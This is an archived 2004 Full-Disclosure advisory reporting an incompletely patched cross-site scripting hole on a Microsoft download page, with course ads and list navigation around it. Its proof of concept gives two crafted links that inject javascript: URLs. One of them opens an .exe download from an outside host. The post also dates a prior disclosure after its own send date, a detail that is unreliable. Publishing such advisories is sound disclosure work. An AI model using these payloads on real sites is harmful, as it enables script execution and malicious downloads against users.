Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security NTBugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com

from [Rafel Ivgi, The-Insider] Network Security [Permanent Link]
Subject: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com
Date: Mon, 4 Oct 2004 18:36:46 +0200 
Cross Site Scripting In Microsoft.com
*****************************

Introduction
------------
It is possible to inject code that executes arbitrary scripts when a user
clicks on a link
within Microsoft's update site page. A proof of concept can be found below.


Technical Details
-----------------
On November 1st, 2004 malware published a proof of concept which
demonstrated
a Cross-Site-Scripting attack in microsoft.com update website. The code he
used
was taken from Dror Shalev's "Safe Center"
(http://www.safecenter.net/crosszone/Top/ServerSide/Dir-wms/WmS-Known.htm).
The original XSS hole was found by "Bitlance Winter". The reported bug was
fixed a few days ago.
However, our testings have shown that the hole was not fully patched.

In contrast to the former problem, which enabled an attacker to inject HTML
code
into web pages, this vulnerability allows an attacker to inject malicious
text strings
into the vulnerable page. These strings are injected into HTML tags,
therefore arbitrary
scripts will be executed when a user clicks on the vulnerable link.



The Code (Proof Of Concept)
------------------------------------------
To activate these attacks, please click on the link named "security update"
under the
title "Internet Explorer 6.0" in the Windows update site.

* <a
href="http://www.microsoft.com/windows/ie/downloads/critical/q316059/downloa
d.asp?sTarget=javascript:window.open('https://www.finjan.com','_parent')|/|/
|/|en">
  Microsoft Cross Site scripting - Download the patch - DEMO 1
  </a>

* <a
href="http://www.microsoft.com/windows/ie/downloads/critical/q316059/downloa
d.asp?sTarget=javascript:window.open('http://www.finjan.com/mcrc/demos/Objec
tData/fire.exe','_parent')|/|/|/|en">
  Microsoft Cross Site scripting - Download the patch - DEMO 2
  </a>



Rafel Ivgi, The-Insider
Security Consultant
Malicious Code Research Center (MCRC)
Finjan Software LTD
E-mail: rivgi@Finjan.com
---------------------------------
Prevention is the best cure!


-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet 
Vital Security 1Box(tm)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  zlib 1.2.2 released, Mark Adler
Next by Date:  Re: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com, offtopic
Previous by Thread:  zlib 1.2.2 released, Mark Adler
Next by Thread:  Re: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com, offtopic
Indexes:  [Date] [Thread] [Top] [All Lists]